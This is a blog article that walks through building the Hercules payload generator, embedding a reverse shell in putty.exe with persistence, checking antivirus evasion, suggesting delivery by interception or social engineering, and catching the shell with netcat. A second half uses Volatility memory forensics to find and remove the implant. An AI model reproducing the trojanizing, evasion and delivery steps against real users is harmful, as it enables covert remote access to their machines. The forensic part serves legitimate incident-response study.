User Rating: 5 / 5

Star ActiveStar ActiveStar ActiveStar ActiveStar Active
 

Some time ago i tested Hercules payload generator, collect some information and analyze after tests with volatility. In this article all steps are described.

NOTE: This article is about Hercules before 19 July 2016.

Below described how to prepare payload, make persistence, some information about execution and forensic job, because this payload too clearly reveals its presence in the system. All test was done on popular Windows7 SP1 x64 with full updates on july 2016. During reading you will understand why i start volatility to do some forensic job.

Hercules is described like undetectable by AV payload, lets test it.

Its written in go, so, first step install golang package:

apt-get install golang

Clone git repo to your workstation:

git clone https://github.com/EgeBalci/Hercules

 

Lets compile it:

cd SOURCE/

go build HERCULES.go

HERCULES.go:13:8: cannot find package "github.com/fatih/color" in any of:

/usr/lib/go-1.6/src/github.com/fatih/color (from $GOROOT)

($GOPATH not set)

Solution:

export GOPATH=$HOME && go get github.com/fatih/color

go build HERCULES.go

 

After compilation completed lets view how to use it:

SOURCE# ./HERCULES

############################ HERCULES REVERSE SHELL ############################

Usage : ./HERCULES <Local Ip> <Local Port> <options>

Options :

-p Payload to use. ( Windows / Linux )

-a The architecture to use. ( x86, x64 )

-l Specify linking type for compiler. ( static, dynamic )

--persistence Enable outo persistence option for continious acces.

--embed="file.exe" Embed the selected payload with selected exe file.

 

Starts with non persistent payload and add payload to putty.exe, which used by many peoples. You can add payload to any executable file, in my variant i used putty:

./HERCULES LISTENER_IP 8443 -p Windows -a x64 -l dynamic --embed="putty.exe" //LISTENER_IP - attacker machine IP address, where netcat should listen for connection from victim

[*] Payload : Windows

[*] Architecture : amd64

[*] Linker : dynamic

[*] Persistence : Disabled

[*] File Embeding : Payload merged with putty.exe

[+] Payload generated as Payload_putty.exe at ~/Desktop/Hercules/SOURCE

Payload wasnt generated at Payload_putty.exe as its described at the end of generation. I find it named Payload.exe.

mv Payload.exe putty8443.exe //named with 8443 to dont forget which port used)))

 

Ok, payload generated, now lets check is it detectable or not. Dont upload payload to VirusTotal site, use http://nodistribute.com.

Detected only by McAfee as backdoor)

 

Detection rate 1 of 35, looks good and very useful, but from 512K putty.exe grows up to 6.1Mb. Attentive user could descry it and pay attention.

 

-rwxr-xr-x 1 user user 6.1M Jul 15 16:41 putty8443p.exe

 -rwxrwxrwx 1 user user 512K Jul 31 2015 putty.exe

 

Next step is deliver malicious putty to victim, how to do it isn't described here, you can use your imagination to do it. For example, change downloaded file during download process with Intercepter-NG or use social engineering.

Now we deliver payload to our victim and should wait for connection, which should be established when user execute our malicious file, use netcat for it:

 

nc -lp 8443

 

 

During execution of the payload UAC message appears, usually user doesn't pay attention to it and click allow and we receive session:

 __ ____________ ________ ____ ___________

/ / / / ____/ __ \/ ____/ / / / / / ____/ ___/

/ /_/ / __/ / /_/ / / / / / / / / __/ \__ \

/ __ / /___/ _, _/ /___/ /_/ / /___/ /___ ___/ /

/_/ /_/_____/_/ |_|\____/\____/_____/_____//____/

############################ HERCULES REVERSE SHELL ############################

Microsoft Windows [Version 6.1.7601]

C:\Users\Administrator\Desktop>whoami

win7\administrator

 

Session with remote workstation could be closed by CTRL+C.

Ok, we test payload - working good, but let me post some remark about it.

First remark:

End user during execution of malicious putty.exe (in this example) see additional CMD window, also winupdt.exe is spawned at the folder from which putty.exe was executed. Its highly increase rate of detection malicious actions in this payload by attentive user and call to the ITSEC department. And user should close both cmd.exe and launched malicious putty.

Second remark:

If netcat isn't listening or accessible from victim, and victim executes malicious putty without connection to attacker listener many windows(putty+cmd) will be opened. And if you close putty – process isnt killed and viewed in the task manager. Its highly increase detection by attentive user.

 

Ok, next step is to test persistent payload:

./HERCULES LISTENER_IP 8443 -p Windows -a x64 -l dynamic --persistence --embed="putty.exe" //--persistent adds to payload to be persistent at the victim system after reboot.

Ok, generated and delivered to victim, windows appears the same as in non-persistent variant. Lets check after reboot.

After reboot and user login if listener is available reverse connection was established. But if listener isn't available many windows (cmd+putty) will open, also payload spawns winupdt.exe in the directory from which was executed.

 

Conclusion:

Hercules payload generator looks good, really undetectable, but has 3 negative properties in my mind:

1) Increase side of executable file too high for low sized files. But in big size file increasing wont be such big.

2) Spawns additional file in folder from which malicious exe was executed.

3) Opens CMD and open CMD+EXE windows many time when listener isnt available.

All these increase detection rate by end user.

 

Now lets imagine that user calls to the it security team and specialist dumps memory of user's workstation to investigate malicious activity. So, at this moment we lost connection with victim computer =( and go another side to catch attacker.

Little how to dump memory from virtualbox guest vm (in my test windows is virtualized):

Start guest with command:

virtualbox --dbg --startvm win7 //win7 - name of the virtual machine in virtualbox

Find Debug menu – commandline: .pgmphystofile win7dump

Wait for memory dumped...

Successfully saved physical memory to 'win7dump'.

This dump is located at user home folder under whom started virtualbox with sudo.

//You can find article about virtualbox in kali linux here

 

Ok, memory dumped (at our example from virtual machine), workstation disconnected from network and it security team starts to analyze what happened.

I will use volatility framework, see https://github.com/volatilityfoundation/volatility for more information.

The main goal is to find why cmd was opened after openning putty, find files, registry hives and network connections, that could explain what happened.

 

Start with viewing process list for suspicious processes:

volatility -f win7dump --profile Win7SP1x64 pslist

Offset(V) Name PID PPID Thds Hnds Sess Wow64 Start Exit

------------------ -------------------- ------ ------ ------ -------- ------ ------ ------------------------------ ------------------------------

0xfffffa800370f4a0 winupdt.exe 2732 2372 1 77 1 1 2016-07-18 07:19:57 UTC+0000

volatility -f win7dump --profile Win7SP1x64 pstree

.. 0xfffffa80036e3b10:cmd.exe 2372 2076 1 23 2016-07-18 07:19:56 UTC+0000

... 0xfffffa800370f4a0:winupdt.exe 2732 2372 1 77 2016-07-18 07:19:57 UTC+0000

volatility -f win7dump --profile Win7SP1x64 cmdline

cmd.exe pid: 2372

Command line : cmd /C winupdt.exe

Ok, winupdt.exe was executed and we viewed a black CMD windows (see screenshot above).

 

Lets try to find if any network connection are linked with this file:

volatility -f win7dump --profile Win7SP1x64 netscan | grep winupdt.exe

No results, so need to collect more information.

 

Check loaded dll for each process and find suspicious:

volatility -f win7dump --profile Win7SP1x64 dlllist

windll.exe pid: 2076

Command line : "C:\Users\Administrator\AppData\Roaming\Windows\windll.exe"

Service Pack 1

Base Size LoadCount Path

------------------ ------------------ ------------------ ----

0x0000000000400000 0x62a000 0xffff C:\Users\Administrator\AppData\Roaming\Windows\windll.exe

0x0000000077260000 0x1aa000 0xffff C:\Windows\SYSTEM32\ntdll.dll

0x0000000077040000 0x11f000 0xffff C:\Windows\system32\kernel32.dll

0x000007fefd310000 0x6a000 0xffff C:\Windows\system32\KERNELBASE.dll

0x000007feff000000 0xdb000 0xffff C:\Windows\system32\advapi32.dll

0x000007fefd7d0000 0x9f000 0xffff C:\Windows\system32\msvcrt.dll

0x000007fefdc90000 0x1f000 0xffff C:\Windows\SYSTEM32\sechost.dll

0x000007fefd630000 0x12d000 0xffff C:\Windows\system32\RPCRT4.dll

0x000007fefeed0000 0x4d000 0xffff C:\Windows\system32\ws2_32.dll

0x000007fefdde0000 0x8000 0xffff C:\Windows\system32\NSI.dll

0x000007fefc7e0000 0x18000 0x1 C:\Windows\system32\CRYPTSP.dll

0x000007fefc4e0000 0x47000 0x1 C:\Windows\system32\rsaenh.dll

0x000007fefce40000 0xf000 0x1 C:\Windows\system32\CRYPTBASE.dll

0x000007fefe120000 0xd8a000 0x1 C:\Windows\system32\shell32.dll

0x000007fefdcb0000 0x71000 0x1 C:\Windows\system32\SHLWAPI.dll

0x000007fefd760000 0x67000 0x17 C:\Windows\system32\GDI32.dll

0x0000000077160000 0xfa000 0x19 C:\Windows\system32\USER32.dll

0x000007fefddd0000 0xe000 0x6 C:\Windows\system32\LPK.dll

0x000007fefdb40000 0xca000 0x6 C:\Windows\system32\USP10.dll

0x000007fefdb10000 0x2e000 0x2 C:\Windows\system32\IMM32.DLL

0x000007fefd870000 0x109000 0x1 C:\Windows\system32\MSCTF.dll

0x000007fefc780000 0x55000 0x3 C:\Windows\system32\mswsock.dll

0x000007fefc120000 0x7000 0x1 C:\Windows\System32\wshtcpip.dll

0x000007fefc770000 0x7000 0x1 C:\Windows\System32\wship6.dll

0x000007fefcde0000 0x57000 0xffff C:\Windows\system32\apphelp.dll

 

cmd.exe pid: 2372

Command line : cmd /C winupdt.exe

Service Pack 1

Base Size LoadCount Path

------------------ ------------------ ------------------ ----

0x0000000049f30000 0x59000 0xffff C:\Windows\system32\cmd.exe

0x0000000077260000 0x1aa000 0xffff C:\Windows\SYSTEM32\ntdll.dll

0x0000000077040000 0x11f000 0xffff C:\Windows\system32\kernel32.dll

0x000007fefd310000 0x6a000 0xffff C:\Windows\system32\KERNELBASE.dll

0x000007fefd7d0000 0x9f000 0xffff C:\Windows\system32\msvcrt.dll

0x000007fefb0e0000 0x8000 0xffff C:\Windows\system32\WINBRAND.dll

0x0000000077160000 0xfa000 0xffff C:\Windows\system32\USER32.dll

0x000007fefd760000 0x67000 0xffff C:\Windows\system32\GDI32.dll

0x000007fefddd0000 0xe000 0xffff C:\Windows\system32\LPK.dll

0x000007fefdb40000 0xca000 0xffff C:\Windows\system32\USP10.dll

0x000007fefdb10000 0x2e000 0x2 C:\Windows\system32\IMM32.DLL

0x000007fefd870000 0x109000 0x1 C:\Windows\system32\MSCTF.dll

0x000007fefcde0000 0x57000 0xffff C:\Windows\system32\apphelp.dll

 

Found process windll.exe with pid=2076 and file located at C:\Users\Administrator\AppData\Roaming\Windows\windll.exe.

Lets check network connections:

volatility -f win7dump --profile Win7SP1x64 netscan | grep windll.exe

0x7db73010 TCPv4 VICTIM_IP:49163 LISTENER_IP:8443 ESTABLISHED 2076 windll.exe

So, an suspicious ip address found and we apologize that it was an attack. Boot victim's workstation at jail network and collect network traffic - connection to LISTENER_IP trying to be established like in memory dump.

Check possible locations of windll.exe:

volatility -f win7dump --profile Win7SP1x64 filescan | grep windll.exe

0x000000007d709810 22 0 R--r-d \Device\HarddiskVolume2\Users\Administrator\AppData\Roaming\Windows\windll.exe

 

In registry a key to load it is located (for persistent mode):

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run with data:

WinDll REG_SZ C:\Users\Administrator\AppData\Roaming\Windows\windll.exe

 

So, now we understand that this is a malicious software that establish reverse connection to attacker's ip address and now we need to clean user's workstation:

To clean delete all: winupdt.exe , windll.exe and registry record.

 

Memory forensic cheat sheet by SANS - http://forensicmethods.com/wp-content/uploads/2012/04/Memory-Forensics-Cheat-Sheet-v1.pdf

 

P.S. In this article non all actions which was done with volatility was shown and output cutted to show only important/interesting information. You can read about it here.

P.S. An update: Hercules releases new version on 19 July 2016 and this article is about old version. So, next time i will try to do the same with new version, if it will do notable actions =)

 

Add comment


Security code
Refresh